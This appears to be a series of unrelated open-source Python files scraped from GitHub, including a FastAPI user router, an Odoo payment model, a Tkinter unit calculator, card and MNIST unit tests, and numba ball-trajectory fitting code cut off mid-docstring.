BoardState(fen=fen)\n\n\ndef board_to_fen(board: Dict[Tuple[str, int], Optional[str]], fen_tail: str) -> str:\n fen_tail = fen_tail.strip()\n ret = []\n\n for r in range(8, 1 - 1, -1):\n cc = 0\n for c in range(0, 8, 1):\n c = chr(c + ord(\"a\"))\n p = (c, r)\n if p in board:\n if cc > 0:\n ret.append(cc)\n cc = 0\n ret.append(board[p])\n else:\n cc += 1\n if cc > 0:\n ret.append(cc)\n ret.append(\"/\")\n\n return f'{\"\".join(str(x) for x in ret)} 
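`board_to_fen` above emits each rank by counting runs of empty squares and flushing the count as a digit whenever it hits a piece. One rank worked through by hand:

```python
# white rooks on a1/h1 and the king on e1 -> "R3K2R"
rank = {("a", 1): "R", ("e", 1): "K", ("h", 1): "R"}
out, empties = [], 0
for c in "abcdefgh":
    piece = rank.get((c, 1))
    if piece is None:
        empties += 1
        continue
    if empties:  # flush the run of empty squares first
        out.append(str(empties))
        empties = 0
    out.append(piece)
if empties:
    out.append(str(empties))
print("".join(out))  # R3K2R
```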
{fen_tail}'\n","repo_name":"RedRem95/j-chess-lib","sub_path":"j_chess_lib/ai/board/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"74894435734","text":"# from typing import List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\n\nfrom app import schemas, services\nfrom app.api import deps\nfrom app.utils import send_new_account_email\n\nrouter = APIRouter()\n\n\n# @router.get(\"/users\")\n# def get_users() -> List[schemas.User]:\n# users = services.user.get_users()\n# return [schemas.User.from_dto(user) for user in users]\n\n\n@router.post(\"/users\", status_code=201)\ndef create_user(user_in: schemas.UserCreate,) -> schemas.User:\n user = schemas.User.from_dto(services.user.create_user(user_in.to_dto()))\n assert user.email is not None\n ident: str = user.email\n send_new_account_email(email_to=ident, username=ident)\n return user\n\n\n@router.get(\"/users/uuid\")\ndef get_current_user_uuid(\n current_user: schemas.User = Depends(deps.get_current_user),\n) -> schemas.User:\n user = services.user.get_user(current_user.uuid)\n return schemas.User.from_dto(user)\n\n\n@router.get(\"/users/{user_uuid}\")\ndef get_user(\n user_uuid: UUID, current_user: schemas.User = Depends(deps.get_current_user)\n) -> schemas.User:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n user = services.user.get_user(current_user.uuid)\n return schemas.User.from_dto(user)\n\n\n@router.put(\"/users/{user_uuid}\", status_code=204)\ndef update_user(\n user_uuid: UUID,\n user_in: schemas.UserUpdate,\n current_user: schemas.User = Depends(deps.get_current_user),\n) -> None:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n services.user.update_user(current_user.provider_uuid, user_uuid, user_in.to_dto())\n return None\n\n\n@router.delete(\"/users/{user_uuid}\", status_code=204)\ndef delete_user(\n user_uuid: UUID, current_user: schemas.User = Depends(deps.get_current_user)\n) -> None:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n services.user.delete_user(current_user.provider_uuid, user_uuid)\n return None\n","repo_name":"Future-Position-X/fpx-monorepo","sub_path":"geo-api/app/app/api/api_v1/endpoints/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"}
+{"seq_id":"6105580696","text":"'''\n\nImplement a function that takes a binary tree as input and outputs its mirror.\n\nFor example, input:\n\n 4\n / \\\n 2 7\n / \\ / \\\n1 3 6 9\nMirrored output:\n\n 4\n / \\\n 7 2\n / \\ / \\\n9 6 3 1\n\n'''\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n def helper(node:TreeNode):\n if not node:\n return\n node.left,node.right = node.right,node.left\n helper(node.left)\n helper(node.right)\n helper(root)\n return root","repo_name":"xiaoqi25478/Job","sub_path":"算法与数据结构/LeetCode/二叉树(BinaryTree)/剑指 Offer 27. 二叉树的镜像.py","file_name":"剑指 Offer 27. 
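The mirror-tree record above swaps children with a recursive helper; the same swap can be done with an explicit stack, which sidesteps recursion-depth limits on degenerate trees. A sketch of that alternative (not the record's own solution):

```python
def mirror_iterative(root):
    stack = [root]
    while stack:
        node = stack.pop()
        if node is None:
            continue
        node.left, node.right = node.right, node.left  # swap in place
        stack.extend((node.left, node.right))
    return root
```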
二叉树的镜像.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"13719967329","text":"import pandas as pd\n\ndef create_medications(names, counts):\n return pd.Series(data=names, index=counts)\n \ndef get_percent(medications, name):\n #print(sum(map(int, medications.index)))\n print(medications.iloc[0])\n #print(medications.loc['chlorhexidine'])\n return 0\n #return medications.iloc[0]/sum(map(int, medications.index)) * 100\n\n\nnames=['chlorhexidine', 'cyntomycin', 'afobazol']\ncounts=[15, 18, 7]\nmedications = create_medications(names, counts)\nprint(get_percent(medications, \"chlorhexidine\")) #37.5\n","repo_name":"zchipirov/edu","sub_path":"PY_10_Введение в Pandas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18765172688","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.exceptions import ValidationError\n\n\nclass AbstractAccountPaymentImputationLine(models.AbstractModel):\n _name = 'abstract.payment.imputation.line'\n\n def _compute_amounts(self):\n for line in self:\n line.update({\n 'amount_residual': abs(line.move_line_id.amount_residual_currency)\n if line.move_line_id.amount_currency else abs(line.move_line_id.amount_residual),\n 'amount_total': abs(line.move_line_id.amount_currency)\n if line.move_line_id.amount_currency else abs(line.move_line_id.debit - line.move_line_id.credit),\n 'amount_residual_company': abs(line.move_line_id.amount_residual),\n 'amount_total_company': abs(line.move_line_id.debit - line.move_line_id.credit)\n })\n\n def _compute_currency_id(self):\n for line in self:\n line.currency_id = line.move_line_id.currency_id or line.move_line_id.company_currency_id\n\n def _compute_name(self):\n for line in self:\n invoice = line.move_line_id.invoice_id\n line.name = invoice.name_get()[0][1] if invoice else line.move_line_id.name\n\n name = fields.Char('Documento', compute='_compute_name')\n move_line_id = fields.Many2one('account.move.line', 'Documento')\n invoice_id = fields.Many2one('account.invoice', 'Factura')\n currency_id = fields.Many2one('res.currency', compute='_compute_currency_id')\n company_currency_id = fields.Many2one(related='move_line_id.company_currency_id')\n amount_residual = fields.Monetary('Restante moneda comprobante', compute='_compute_amounts')\n amount_total = fields.Monetary('Total moneda comprobante', compute='_compute_amounts')\n amount_residual_company = fields.Monetary('Restante moneda empresa', compute='_compute_amounts')\n amount_total_company = fields.Monetary('Total moneda empresa', 
compute='_compute_amounts')\n company_id = fields.Many2one(\n 'res.company',\n string='Compania',\n related='move_line_id.company_id',\n store=True,\n readonly=True,\n related_sudo=False\n )\n concile = fields.Boolean('Conciliacion completa')\n\n\nclass PaymentImputationLine(models.Model):\n _name = 'payment.imputation.line'\n _inherit = 'abstract.payment.imputation.line'\n\n @api.depends('payment_id.payment_date', 'company_currency_id', 'payment_currency_id')\n def _get_payment_amounts(self):\n for line in self:\n company_currency = line.company_currency_id\n payment_currency = line.payment_currency_id\n if payment_currency:\n date = line.payment_id.payment_date or fields.Date.today()\n residual = company_currency.with_context(date=date).compute(\n line.amount_residual_company, payment_currency\n )\n total = company_currency.with_context(date=date).compute(\n line.amount_total_company, payment_currency\n )\n else:\n residual = line.amount_residual_company\n total = line.amount_total_company\n\n line.update({\n 'amount_residual_in_payment_currency': residual,\n 'amount_total_in_payment_currency': total,\n })\n\n payment_id = fields.Many2one('account.payment', 'Pago', ondelete='cascade')\n amount = fields.Monetary('Total A imputar', currency_field='payment_currency_id')\n payment_currency_id = fields.Many2one(related='payment_id.currency_id', readonly=True)\n payment_state = fields.Selection(related='payment_id.state')\n amount_residual_in_payment_currency = fields.Monetary(\n compute='_get_payment_amounts',\n currency_field='payment_currency_id'\n )\n amount_total_in_payment_currency = fields.Monetary(\n compute='_get_payment_amounts',\n currency_field='payment_currency_id'\n )\n\n @api.onchange('concile')\n def onchange_concile(self):\n self.amount = self.amount_residual_in_payment_currency if self.concile else self.amount\n\n @api.onchange('amount')\n def onchange_amount(self):\n self.concile = self.amount == self.amount_residual_in_payment_currency\n\n def validate(self, invoice_move_line):\n \"\"\"\n Valida que no haya problemas a la necesitar generar una imputacion a una invoice\n :param invoice_move_line: account.move.line de la invoice\n \"\"\"\n self.ensure_one()\n # Caso que se modifique el asiento y deje inconsistencia\n if len(invoice_move_line) != 1:\n raise ValidationError(\"El asiento de la factura que se quiere imputar no tiene cuentas deudoras \"\n \"o tiene mas de una asociada, por favor, modificar el asiento primero\")\n if self.amount_residual_in_payment_currency < self.amount or self.amount < 0:\n raise ValidationError(\"No se pueden imputar importes negativos o mayores que lo que reste pagar\")\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"test-odoorosario/opt","sub_path":"odoo_addons_l10n_ar/l10n_ar_payment_imputation/models/payment_imputation_line.py","file_name":"payment_imputation_line.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16110756012","text":"# 코드 출처: https://uipath.tistory.com/135\n# api 참고 https://developers.google.com/drive/api/v3/reference?hl=ko\nfrom Google import Gdrive\n \n \nCLIENT_SECRET_FILE = '/Users/dongyokim/main/jupyter/2022:Summer/크롤링 스터디/5/credentials.json'\nAPI_NAME = 'drive'\nAPI_VERSION = 'v3'\nSCOPES = ['https://www.googleapis.com/auth/drive']\n\nservice = Gdrive(CLIENT_SECRET_FILE, API_NAME, API_VERSION, SCOPES)\n\nprint(dir(service)) \n\n\n\n\n# 폴더 생성 테스트 \nfolders = ['folder1', 
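The Drive snippet above creates folders by POSTing metadata with the folder MIME type; the matching read uses `files().list` with a `q` filter on that same MIME type. A sketch reusing the `service` object built above (query syntax per the Drive v3 API):

```python
resp = service.files().list(
    q="mimeType='application/vnd.google-apps.folder'",
    fields="files(id, name)",
).execute()
for f in resp.get("files", []):
    print(f["name"], f["id"])
```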
'folder2', 'folder3']\n\nfor folder in folders:\n file_metadata = {\n 'name' : folder, \n 'mimeType' : 'application/vnd.google-apps.folder'\n }\n\n service.files().create(body=file_metadata).execute()\n\n\n\n\n","repo_name":"ehddy/crawling_study","sub_path":"5/Create_Service.py","file_name":"Create_Service.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35137244374","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\n#colors\n\ncolor1 = '#3b3b3b' # black\ncolor2 = '#ffffff' # white\ncolor3 = '#48b3e0' # blue\n\njanela = Tk()\njanela.title('')\njanela.geometry('650x260')\njanela.configure(bg=color1)\n\n# Window Frames\n\nframe_up = Frame(janela, width=450, height=50, bg=color2, pady=0, padx=3, relief='flat')\nframe_up.place(x=2, y=2)\n\nframe_left = Frame(janela, width=450, height=220, bg=color2, pady=0, padx=3, relief='flat')\nframe_left.place(x=2, y=55)\n\nframe_right = Frame(janela, width=198, height=260, bg=color2, pady=0, padx=3, relief='flat')\nframe_right.place(x=455, y=2)\n\n# Window Style\n\nstyle = ttk.Style(janela)\nstyle.theme_use(\"clam\")\n\n# Up Frame Config\n\nl_app_name = Label(frame_up, text='Unit Calculator', height=1, padx=0, relief='flat', anchor='center', font=('Ivy 15 bold'), bg=color2, fg=color3)\nl_app_name.place(x=80, y=10)\n\n# Button Weight\n\nw=130 #buttun width\n\nimg_0 = Image.open('icons/weight.png')\nimg_0 = img_0.resize((50,50), Image.ANTIALIAS)\nimg_0 = ImageTk.PhotoImage(img_0)\nbutton0 = Button(frame_left, text='Weight', image=img_0, compound=LEFT, width=125, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton0.grid(row=0, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Time\nimg_1 = Image.open('icons/time.png')\nimg_1 = img_1.resize((50,50), Image.ANTIALIAS)\nimg_1 = ImageTk.PhotoImage(img_1)\nbutton1 = Button(frame_left, text='Time', image=img_1, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton1.grid(row=0, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Length\nimg_2 = Image.open('icons/length.png')\nimg_2 = img_2.resize((50,50), Image.ANTIALIAS)\nimg_2 = ImageTk.PhotoImage(img_2)\nbutton2 = Button(frame_left, text='Length', image=img_2, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton2.grid(row=0, column=2, sticky=NSEW, padx=5, pady=5)\n\n# Button Area\nimg_3 = Image.open('icons/area.png')\nimg_3 = img_3.resize((50,50), Image.ANTIALIAS)\nimg_3 = ImageTk.PhotoImage(img_3)\nbutton3 = Button(frame_left, text=' Area', image=img_3, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton3.grid(row=1, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Volume\nimg_4 = Image.open('icons/volume.png')\nimg_4 = img_4.resize((50,50), Image.ANTIALIAS)\nimg_4 = ImageTk.PhotoImage(img_4)\nbutton4 = Button(frame_left, text='Volume', image=img_4, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton4.grid(row=1, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Speed\nimg_5 = Image.open('icons/speed.png')\nimg_5 = img_5.resize((50,50), Image.ANTIALIAS)\nimg_5 = ImageTk.PhotoImage(img_5)\nbutton5 = 
Button(frame_left, text='Speed', image=img_5, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton5.grid(row=1, column=2, sticky=NSEW, padx=5, pady=5)\n\n# Button Temperature\nimg_6 = Image.open('icons/temperature.png')\nimg_6 = img_6.resize((50,50), Image.ANTIALIAS)\nimg_6 = ImageTk.PhotoImage(img_6)\nbutton6 = Button(frame_left, text='Temperature', image=img_6, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 9 bold'), bg=color3, fg=color2)\nbutton6.grid(row=2, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Energy\nimg_7 = Image.open('icons/energy.png')\nimg_7 = img_7.resize((50,50), Image.ANTIALIAS)\nimg_7 = ImageTk.PhotoImage(img_7)\nbutton7 = Button(frame_left, text='Energy', image=img_7, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton7.grid(row=2, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Pressure\nimg_8 = Image.open('icons/pressure.png')\nimg_8 = img_8.resize((50,50), Image.ANTIALIAS)\nimg_8 = ImageTk.PhotoImage(img_8)\nbutton8 = Button(frame_left, text='Pressure', image=img_8, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton8.grid(row=2, column=2, sticky=NSEW, padx=5, pady=5)\n\njanela.mainloop()\n\n#Right Frame","repo_name":"felipesimao1/units-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"25295957304","text":"from Cards import *\nimport unittest\nimport random\nglobal rank,suit\nrank = ['A','2','3','4','5','6','7','8','9','10','J','Q','K']\nsuit = ['S','C','H','D']\n\nclass TestCards(unittest.TestCase):\n\n def setUp(self):\n r = random.choice(rank)\n s = random.choice(suit)\n self.new_card = Card(r,s)\n self.new_deck = Deck()\n self.new_deck1 = Deck()\n\n def test_get_rank(self):\n '''test whether the function gets the rank of the card'''\n self.assertEqual(self.new_card.get_rank(), self.new_card.r)\n self.assertFalse(self.new_card.get_rank() != self.new_card.r)\n\n def test_get_suit(self):\n '''test whether the function gets the suit of the card'''\n self.assertEqual(self.new_card.get_suit(), self.new_card.s)\n self.assertFalse(self.new_card.get_suit() != self.new_card.s)\n\n def test_get_value(self):\n '''test whether the function gets the value of the card'''\n for self.new_card.r in rank:\n if self.new_card.r == 'A':\n self.assertEqual(self.new_card.get_value(), 1)\n elif self.new_card.r in ['J','Q','K']:\n self.assertEqual(self.new_card.get_value(), 10)\n else:\n self.assertEqual(self.new_card.get_value(), int(self.new_card.r))\n\n def test_card__str__(self):\n '''test whether the function prints the card'''\n self.assertEqual(str(self.new_card), str(self.new_card.r+self.new_card.s))\n\n def test_shuffle(self):\n '''test whether the function shuffles the deck'''\n self.assertEqual(str(self.new_deck),str(self.new_deck1))\n self.new_deck.shuffle()\n self.assertFalse(str(self.new_deck) == str(self.new_deck1))\n\n def test_get_deck(self):\n '''test whether the function gets the deck'''\n k = 0\n for i in range(0,4):\n for j in range(0,13):\n self.assertEqual(str(self.new_deck1.get_deck()[k]), str(rank[j])+str(suit[i]))\n k +=1\n\n def test_deal(self):\n '''test whether the function deals one card'''\n 
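# A minimal sanity sketch of the ordering assumption behind the assertion
# below (illustrative only; the Deck internals are not shown in this file):
# if Deck builds its cards suit-major over suit = ['S','C','H','D'] with
# ranks 'A'..'K' inside each suit, as test_get_deck above verifies, then
# the last card of an unshuffled deck is 'KD', so a deal() that pops from
# the end of the list returns it:
#   deck = [r + s for s in suit for r in rank]
#   assert deck[-1] == 'KD' and deck.pop() == 'KD'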
self.assertEqual(str(self.new_deck.deal()),'KD')\n\n    def test_deck__str__(self):\n        '''test whether the function prints the deck'''\n        deck = ''\n        for i in range(0,4):\n            for j in range(0,13):\n                deck = deck+str(rank[j])+str(suit[i])+'\\n'\n        self.assertEqual(str(self.new_deck), deck)\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestCards)\nunittest.TextTestRunner(verbosity=2).run(suite)","repo_name":"terrymyy-zz/pair-programing","sub_path":"CardsTest.py","file_name":"CardsTest.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"11522858720","text":"\nimport pytest\nimport numpy as np\n\nfrom util import get_image_data_ubyte\nfrom util import get_image_data_train\nfrom util import get_image_data_test\n\nfrom util import get_label_data_ubyte\nfrom util import get_label_data_train\nfrom util import get_label_data_test\n\nfrom util import hot_one_arrays\n\nfrom constants import test_images_filename\nfrom constants import test_labels_filename\nfrom constants import num_train_samples\nfrom constants import num_test_samples\nfrom constants import image_size\n\n# images\n\ndef test_get_image_data_ubyte():\n filename = test_images_filename\n result = get_image_data_ubyte(\n filename=filename, \n num_images=num_test_samples,\n image_size=image_size\n )\n assert len(result) == num_test_samples\n assert len(result[0]) == image_size\n\ndef test_get_image_data_train():\n result = get_image_data_train()\n assert len(result) == num_train_samples\n assert len(result[0]) == image_size\n\ndef test_get_image_data_test():\n result = get_image_data_test()\n assert len(result) == num_test_samples\n assert len(result[0]) == image_size\n\n# labels\n\ndef test_get_label_data_ubyte():\n filename = test_labels_filename\n result = get_label_data_ubyte(\n filename=filename, \n num_labels=num_test_samples\n )\n assert len(result) == num_test_samples\n assert result[0] >= 0 and result[0] <= 9\n\ndef test_get_label_data_train():\n result = get_label_data_train()\n assert len(result) == num_train_samples\n assert result[0] >= 0 and result[0] <= 9\n\ndef test_get_label_data_test():\n result = get_label_data_test()\n assert len(result) == num_test_samples\n assert result[0] >= 0 and result[0] <= 9\n\n# other\n\ndef test_hot_one():\n result = hot_one_arrays(np.array([ 3, 0, 5, 1 ]))\n expected_result = np.array([\n [0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1],\n [0, 1, 0, 0, 0, 0]\n ])\n np.testing.assert_equal(result, expected_result)\n\n\n","repo_name":"ryanbennettvoid/ml-practice2020","sub_path":"multiclass_classification_chars/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"27870300903","text":"import json\nimport numpy as np\nfrom numba import jit\n\nfrom trajectories.utils import *\n\n\"\"\"All this is based on this paper: https://www.researchgate.net/publication/4246136_A_Novel_Data_Association_Algorithm_for_Object_Tracking_in_Clutter_with_Application_to_Tennis_Video_Analysis\"\"\"\n\n\n@jit\ndef find_seed_triplets(candidates: np.ndarray, n_candidates: np.ndarray, k: int, radius=100):\n    \"\"\"Find seed triplets for the given candidate list\n\n    Parameters\n    ----------\n    candidates : np.ndarray, shape (:, max_candidates, 2)\n        positions of the detection candidates.\n        The first dimension refers to the frames,\n        the second dimension to the 
candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k : int\n frame of which to find the seed triplet\n radius : int, optional\n maximum distance between candidates of different frames\n to use them for a seed triplet, by default 100\n\n Returns\n -------\n seed_triplets: np.ndarray of shape (num_seed_triplets, 3).\n The second component contains the indices of the candidates in:\n - k-1\n - k\n - k+1\n respectively.\n \"\"\"\n\n if k+1 >= len(n_candidates):\n return None\n\n seed_triplets_i = []\n\n for i, candidate in enumerate(candidates[k, :n_candidates[k]]):\n for i_prev, prev_candidate in enumerate(candidates[k-1, :n_candidates[k-1]]):\n for i_next, next_candidate in enumerate(candidates[k+1, :n_candidates[k+1]]):\n if squared_distance(candidate, prev_candidate) < radius**2 and squared_distance(candidate, next_candidate) < radius**2:\n seed_triplets_i.append([i_prev, i, i_next])\n\n if len(seed_triplets_i) == 0:\n return None\n return np.asarray(seed_triplets_i)\n\n\n@jit\ndef estimate_parameters(p1: np.ndarray, p2: np.ndarray, p3: np.ndarray, dk21: int, dk32: int):\n \"\"\"Estimate parameters for a constant acceleration model (a parabola).\n The fitted model is:\n - a = 2 * (dk21 * (p3-p2) - dk32 * (p2-p1)) / (dk21 * dk32 * (dk21+dk32))\n - v1 = (p2-p1)/dk21 - dk21*a/2\n\n Parameters\n ----------\n p1 : np.ndarray\n position vector of the first point\n p2 : np.ndarray\n position vector of the second point\n p3 : np.ndarray\n position vector of the third point\n dk21 : int\n difference between the timesteps of the first and second points\n dk32 : int\n difference between the timesteps of the second and third points\n\n Returns\n -------\n v1, a: np.ndarray\n v1: velocity vector between the first and second point\n a: acceleration y\n \"\"\"\n a = 2 * (dk21 * (p3-p2) - dk32 * (p2-p1)) / (dk21 * dk32 * (dk21+dk32))\n v1 = (p2-p1)/dk21 - dk21*a/2\n return v1, a\n\n\n@jit\ndef estimate_position(pos, v, a, dk):\n return pos + dk*v + dk*dk*a/2\n\n\n@jit\ndef compute_trajectory(seed_position: np.ndarray, v: np.ndarray, a: np.ndarray, window_size: int, window_center: int = 0):\n \"\"\"Compute the estimated positions along each timestep in the window\n\n Parameters\n ----------\n seed_position : np.ndarray\n starting position\n v : np.ndarray\n velocity vector between the first and second point \n a : np.ndarray\n acceleration vector\n window_size : int\n size of the window\n window_center : int\n center of the window. 
If 0, the window is centered on the seed position\n\n    Returns\n    -------\n    np.ndarray of shape(window_size, 2)\n        contains all the estimated positions\n    \"\"\"\n\n    k0 = window_center - (window_size-1)//2\n\n    positions = np.zeros((window_size, 2))\n    for k in range(len(positions)):\n        positions[k] = estimate_position(seed_position, v, a, k+k0)\n    return positions\n\n\n@jit\ndef find_support(trajectory: np.ndarray, candidates: np.ndarray, n_candidates: np.ndarray, d_threshold: float, window_center: int):\n    \"\"\"Find the support of the given trajectory\n\n    Parameters\n    ----------\n    trajectory : np.ndarray\n        trajectory of the ball\n    candidates : np.ndarray, shape (:, max_candidates, 2)\n        positions of the detection candidates.\n        The first dimension refers to the frames,\n        the second dimension to the candidate in each frame\n        and the third one to the x and y components: the first element is y, the second one x.\n    n_candidates : 1D np.ndarray\n        number of candidates in each frame. Necessary for jit compilation\n    d_threshold : float\n        maximum distance between the true position of the candidates and the estimated position\n        in the previous iteration\n    window_center : int\n        center of the window in frames. The center must be the seed frame.\n\n    Returns\n    -------\n    support: np.ndarray of shape (support_size, 2)\n        frame indices in (:,0) and candidate indices in (:,1)\n    \"\"\"\n    support_k = []\n    support_i = []\n\n    window_size = len(trajectory)\n    k0 = window_center - (window_size-1)//2\n\n    for k in range(min(window_size, len(n_candidates)-k0)):\n        estimated_position = trajectory[k]\n\n        candidate_idx = -1\n        d2_min = d_threshold**2\n        for i in range(n_candidates[k+k0]):\n            d2 = squared_distance(candidates[k+k0,i], estimated_position)\n            if d2 < d2_min:\n                d2_min = d2\n                candidate_idx = i\n\n        if candidate_idx >= 0:\n            support_k.append(k+k0)\n            support_i.append(candidate_idx)\n\n    support = np.zeros((len(support_k), 2), dtype=np.int32)\n    support[:, 0] = support_k\n    support[:, 1] = support_i\n    return support\n\n\n@jit\ndef find_next_triplet(support: np.ndarray):\n    \"\"\"Find the next frame triplet from the given support.\n\n    Parameters\n    ----------\n    support: np.ndarray of shape (support_size, 2)\n        frame indices in (:,0) and candidate indices in (:,1)\n\n    Returns\n    -------\n    k_min, k_mid, k_max: int\n        frame indices of the triplet\n    i_min, i_mid, i_max: int\n        candidate indices in their frame\n    \"\"\"\n    k_min, k_mid, k_max = -1, -1, -1\n    i_min, i_mid, i_max = -1, -1, -1\n\n    if len(support) >= 3:\n        k_min = support[0,0]\n        i_min = support[0,1]\n\n        k_max = support[-1,0]\n        i_max = support[-1,1]\n\n        s_mid = find_middle_support_index(support)\n\n        k_mid = support[s_mid,0]\n        i_mid = support[s_mid,1]\n\n    return k_min, k_mid, k_max, i_min, i_mid, i_max\n\n\n@jit\ndef trajectory_cost(trajectory: np.ndarray, candidates: np.ndarray, n_candidates: np.ndarray, d_threshold: float, window_center: int):\n    window_size = len(trajectory)\n    k0 = window_center - (window_size-1)//2\n\n    cost = 0\n    for k in range(min(window_size, len(n_candidates)-k0)):\n        for i in range(n_candidates[k+k0]):\n            d2 = squared_distance(trajectory[k], candidates[k+k0,i])\n            d2 = min(d2, d_threshold**2)\n            cost += d2\n    return cost\n\n\n@jit\ndef fit_trajectories_on_seed(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n    \"\"\"Fit trajectories to position candidates for a seed frame.\n    Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n\n    Parameters\n    ----------\n    candidates : np.ndarray, shape (:, max_candidates, 
2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n radius : int\n maximum distance between candidates of different frames\n to use them for a seed triplet\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (num_seed_triplets, 2, 2)\n the parameters of the fitted parabolic trajectories for each seed triplet.\n In the second dimension the order is: v, a\n info : np.ndarray of shape (num_seed_triplets, 10)\n Information about the candidates in the support for each seed triplet.\n The values in the second component correspond respectively to:\n - `'k_seed'`: index of the seed frame\n - `'k_min'`: index of the first frame used to fit the trajectory\n - `'k_mid'`: index of the second frame used to fit the trajectory\n - `'k_max'`: index of the third frame used to fit the trajectory\n - `'i_seed'`: index of the candidate in the seed frame\n - `'i_min'`: index of the candidate in the first frame\n - `'i_mid'`: index of the candidate in the second frame\n - `'i_max'`: index of the candidate in the third frame\n - `'n_support'`: number of support candidates\n - `'iterations'`: number of iterations before convergence\n\n trajectories : np.ndarray of shape (num_seed_triplets, 2*N+1, 2)\n fitted trajectories along the whole window\n supports: np.ndarray of shape (num_seed_triplets, support_size, 2)\n frame indices in (:,:,0) and candidate indices in (:,:,1)\n costs : np.ndarray of shape (num_seed_triplets)\n costs of each trajectory. 
